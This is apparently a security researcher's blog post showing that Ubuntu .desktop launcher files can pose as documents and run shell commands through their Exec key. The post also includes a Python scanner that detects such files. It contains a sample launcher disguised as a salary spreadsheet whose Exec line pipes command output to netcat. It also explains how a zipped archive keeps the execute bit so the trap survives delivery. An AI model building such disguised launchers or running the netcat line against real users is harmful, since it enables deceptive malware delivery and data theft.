Using Ubuntu .DESKTOP as a Malware Vector


I have noticed a weird behavior in .DESKTOP file extensions that can be used as a malware vector. This issue is not detected as malware by all known AVs, and the way it behaves makes it a rich resource for spreading malware against Ubuntu and Linux Desktop users in general. I will focus on Ubuntu Desktop in this blog post.

Introduction

File managers on Ubuntu (Nautilus, Caja, and Thunar were tested) treat .desktop files specially. The file manager parses the .desktop file and displays it under the name saved in its Desktop Entry; it also replaces the file icon with the one specified in the entry.

Example .desktop File

Let’s say the file is named “firefox.desktop” and is saved at “/root/test/”:

#!/usr/bin/env xdg-open

[Desktop Entry]
Version=1.0
Type=Application
Name = Firefox Browser
Comment = Firefox Browser
Icon = /path/to/icon

When navigating to “/root/test” via a file manager, we see a file called “Firefox Browser” with the Firefox icon instead of a file called “firefox.desktop”.

Let’s dive more into “Desktop Entry” options.

One of the most interesting keys is “Exec”. It takes the given command line and passes it to a shell to be executed. That doesn’t sound nice.

We can inject a payload into a custom-crafted .desktop file designed to mimic an interesting document.

#!/usr/bin/env xdg-open

[Desktop Entry]
Version=1.0
Type=Application
Terminal=false
Name = Employees Salary.xslx
Comment = Employees Salary.xslx
Icon = libreoffice-calc
Exec = /bin/sh -c "id | nc 127.0.0.1 1337"

Save the file as “payload.desktop”. Thanks to the file manager, it is displayed as “Employees Salary.xslx” with the LibreOffice Calc icon. Once a user clicks on the file, the payload is executed.

Profit?

Stealthy malware vector on Ubuntu Desktop.

Obstacles of Successful Exploitation

Execute permission is an obstacle to exploitation. When a .desktop file does not have execute permission, we get the following error:

This error can be bypassed by presetting the permissions (to 07555, for example) so that the file is executable, then zipping the file and delivering it as a ZIP archive. When the archive is decompressed, the same permissions are restored. The malware vector generally works with any distribution that supports .desktop files.

Proof of Concept

I have made a test repository with a simple PoC that will pop up a calc.

To test on your local machine:

$ git clone "https://github.com/mazen160/Ubuntu-Desktop-Malware-Vector-Demo.git"

Then, navigate to the “Demo” folder using a file manager. You will see the following when clicking on the file:

Actions

I have contacted Ubuntu security, and they have decided to accept the risk of this issue. Therefore, the issue is still there and affects millions of users online.

Recommendation

It’s tricky to recommend that users stop using file managers to mitigate the issue. However, I recommend checking/opening untrusted files via the CLI. This helps in detecting exploitation of the .desktop malware vector.
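As an added defensive example (my own code, not part of the original post or its PoC repository), the scanner below does the CLI check this section recommends: it parses .desktop files the way a file manager would (skipping the xdg-open shebang and tolerating spaces around “=”), flags a Type=Application entry whose Name ends in a document extension while carrying an Exec line, and reports whether the execute bit is set. Because the “Obstacles” section notes that the execute bit survives a ZIP round-trip, it also inspects ZIP archives without extracting them, reading the Unix mode from each entry’s external attributes. The DOCUMENT_EXTS heuristic, the constructed sample entry (with a harmless echo in place of the post’s payload) and the file names are assumptions made for the demo.

```python
import os
import stat
import zipfile
import tempfile

# Heuristic (assumption): extensions a user expects to open a document, not run a program.
DOCUMENT_EXTS = (".xlsx", ".xslx", ".docx", ".doc", ".pdf", ".odt", ".ods", ".pptx", ".txt")


def parse_desktop(text):
    """Minimal [Desktop Entry] parser: skips the optional shebang and '#' comments,
    tolerates spaces around '=', and returns {key: value} for the main group."""
    entry = {}
    in_group = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_group = line == "[Desktop Entry]"
            continue
        if in_group and "=" in line:
            key, value = line.split("=", 1)
            entry[key.strip()] = value.strip()
    return entry


def assess_entry(entry, executable):
    """Findings for one parsed entry; an empty list means nothing suspicious."""
    findings = []
    name = entry.get("Name", "")
    if entry.get("Type") == "Application" and "Exec" in entry:
        if name.lower().endswith(DOCUMENT_EXTS):
            findings.append("Name %r mimics a document but the entry runs %r" % (name, entry["Exec"]))
        if executable:
            findings.append("execute bit set, so the file manager will run Exec on click")
    return findings


def scan_directory(path):
    """Scan *.desktop files on disk; return {filename: [findings]} for flagged files."""
    results = {}
    for fn in os.listdir(path):
        if not fn.endswith(".desktop"):
            continue
        full = os.path.join(path, fn)
        with open(full, encoding="utf-8", errors="replace") as fh:
            entry = parse_desktop(fh.read())
        executable = bool(os.stat(full).st_mode & stat.S_IXUSR)
        findings = assess_entry(entry, executable)
        if findings:
            results[fn] = findings
    return results


def scan_zip(path):
    """Inspect a ZIP without extracting it: the Unix mode lives in the high 16 bits
    of external_attr, so an executable .desktop is visible before anything touches disk."""
    results = {}
    with zipfile.ZipFile(path) as zf:
        for info in zf.infolist():
            if not info.filename.endswith(".desktop"):
                continue
            executable = bool((info.external_attr >> 16) & 0o111)
            entry = parse_desktop(zf.read(info).decode("utf-8", "replace"))
            findings = assess_entry(entry, executable)
            if findings:
                results[info.filename] = findings
    return results


# Constructed sample mirroring the post's entry, with a harmless command in Exec.
SAMPLE = """#!/usr/bin/env xdg-open

[Desktop Entry]
Version=1.0
Type=Application
Terminal=false
Name = Employees Salary.xslx
Comment = Employees Salary.xslx
Icon = libreoffice-calc
Exec = /bin/sh -c "echo demo"
"""


def demo():
    """Write the sample as an executable .desktop, zip it, scan both; return both result dicts."""
    tmp = tempfile.mkdtemp()
    desktop = os.path.join(tmp, "payload.desktop")
    with open(desktop, "w") as fh:
        fh.write(SAMPLE)
    os.chmod(desktop, 0o755)
    archive = os.path.join(tmp, "salary.zip")
    with zipfile.ZipFile(archive, "w") as zf:
        zf.write(desktop, "payload.desktop")  # ZipFile.write stores the mode from os.stat
    return scan_directory(tmp), scan_zip(archive)


if __name__ == "__main__":
    for label, res in zip(("directory", "zip"), demo()):
        for fn, findings in res.items():
            print("%s: %s" % (label, fn))
            for finding in findings:
                print("  - " + finding)
```

Run it as-is to see both scans flag the sample, or point scan_directory at a download folder and scan_zip at an incoming archive. The ZIP check is the more useful of the two for a mail gateway or download hook, since it catches the executable bit before the file exists on the desktop where a click can run it.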

Final Thoughts

This was an interesting idea I had in mind that I thought of sharing. I’m looking forward to your opinions regarding this technique.

Mazin Ahmed
